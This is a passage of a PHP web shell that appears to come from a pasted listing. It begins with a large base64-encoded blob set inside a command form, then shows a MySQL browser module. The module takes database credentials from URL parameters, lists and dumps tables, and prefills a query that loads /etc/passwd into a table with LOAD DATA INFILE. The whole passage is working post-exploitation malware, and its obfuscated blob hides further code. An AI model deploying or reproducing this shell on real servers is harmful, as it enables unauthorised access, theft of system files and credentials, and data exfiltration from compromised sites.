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')));;echo '</textarea>
  1083. </td>
  1084. </tr>
  1085. <tr>
  1086. <td>
  1087. <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  1088. </td>
  1089. </tr>
  1090. </table>
  1091. </form>
  1092. ';
  1093. }
  1094. elseif(isset($_GET['x']) &&($_GET['x'] == 'mysql'))
  1095. {
  1096. if(isset($_GET['sqlhost']) &&isset($_GET['sqluser']) &&isset($_GET['sqlpass']) &&isset($_GET['sqlport']))
  1097. {
  1098. $sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];
  1099. if($con = @mysql_connect($sqlhost.':'.$sqlport,$sqluser,$sqlpass))
  1100. {
  1101. $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  1102. $msg .= '<p>Connected to '.$sqluser."<span class=\"gaya\">@</span>".$sqlhost.':'.$sqlport;
  1103. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd.'&amp;x=mysql&amp;
  1104. sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;
  1105. sqlpass='.$sqlpass.'&amp;
  1106. sqlport='.$sqlport."&amp;\">[ databases ]</a>";
  1107. if(isset($_GET['db']))
  1108. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  1109. <a href=\"y=".$pwd.'&amp;x=mysql&amp;
  1110. sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;
  1111. sqlpass='.$sqlpass.'&amp;
  1112. sqlport='.$sqlport.'&amp;
  1113. db='.$_GET['db']."\">".htmlspecialchars($_GET['db']).'</a>';
  1114. if(isset($_GET['table']))
  1115. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  1116. </span>&nbsp;&nbsp;
  1117. <a href=\"y=".$pwd.'&amp;x=mysql&amp;
  1118. sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;
  1119. sqlpass='.$sqlpass.'&amp;sqlport='.$sqlport.'&amp;
  1120. db='.$_GET['db'].'&amp;
  1121. table='.$_GET['table']."\">".htmlspecialchars($_GET['table']).'</a>';
  1122. $msg .= '</p><p>version : '.mysql_get_server_info($con).' proto '.mysql_get_proto_info($con).'</p>';
  1123. $msg .= '</div>';
  1124. echo $msg;
  1125. if(isset($_GET['db']) &&(!isset($_GET['table'])) &&(!isset($_GET['sqlquery'])))
  1126. {
  1127. $db = $_GET['db'];
  1128. $query = "DROP TABLE IF EXISTS CyberSEC_table;
  1129. \nCREATE TABLE `CyberSEC_table` ( `file` LONGBLOB NOT NULL );
  1130. \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM CyberSEC_table;
  1131. \nDROP TABLE IF EXISTS CyberSEC_table;";
  1132. $msg = "<div style=\"width:99%;padding:0 10px;\">
  1133. <form action=\"?\" method=\"get\">
  1134. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1135. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1136. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1137. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1138. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1139. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1140. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1141. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  1142. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1143. </form>
  1144. </div> ";
  1145. $tables = array();
  1146. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db.'</th></tr>';
  1147. $hasil = @mysql_list_tables($db,$con);
  1148. while(list($table) = @mysql_fetch_row($hasil))
  1149. {@array_push($tables,$table);}
  1150. @sort($tables);
  1151. foreach($tables as $table)
  1152. {
  1153. $msg .= "<tr><td><a href=\"?y=".$pwd.'&amp;x=mysql&amp;sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;sqlpass='.$sqlpass.'&amp;sqlport='.$sqlport.'&amp;db='.$db.'&amp;table='.$table."\">$table</a></td></tr>";
  1154. }
  1155. $msg .= '</table>';
  1156. }
  1157. elseif(isset($_GET['table']) &&(!isset($_GET['sqlquery'])))
  1158. {
  1159. $db = $_GET['db'];
  1160. $table = $_GET['table'];
  1161. $query = 'SELECT * FROM '.$db.'.'.$table.' LIMIT 0,100;';
  1162. $msgq = "<div style=\"width:99%;padding:0 10px;\">
  1163. <form action=\"?\" method=\"get\">
  1164. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1165. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1166. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1167. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1168. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1169. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1170. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1171. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  1172. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1173. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1174. </form>
  1175. </div> ";
  1176. $columns = array();
  1177. $msg = "<table class=\"explore\" style=\"width:99%;\">";
  1178. $hasil = @mysql_query('SHOW FIELDS FROM '.$db.'.'.$table);
  1179. while(list($column) = @mysql_fetch_row($hasil))
  1180. {
  1181. $msg .= "<th>$column</th>";$kolum = $column;
  1182. }
  1183. $msg .= '</tr>';
  1184. $hasil = @mysql_query('SELECT count(*) FROM '.$db.'.'.$table);
  1185. list($total) = mysql_fetch_row($hasil);
  1186. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  1187. else $page = 1;
  1188. $pagenum = 100;
  1189. $totpage = ceil($total / $pagenum);
  1190. $start = (($page -1) * $pagenum);
  1191. $hasil = @mysql_query('SELECT * FROM '.$db.'.'.$table.' LIMIT '.$start.','.$pagenum);
  1192. while($datas = @mysql_fetch_assoc($hasil))
  1193. {
  1194. $msg .= '<tr>';
  1195. foreach($datas as $data){if(trim($data) == '') $data = '&nbsp;';$msg .= "<td>$data</td>";}
  1196. $msg .= '</tr>';
  1197. }
  1198. $msg .= '</table>';
  1199. $head = "<div style=\"padding:10px 0 0 6px;\">
  1200. <form action=\"?\" method=\"get\">
  1201. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1202. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
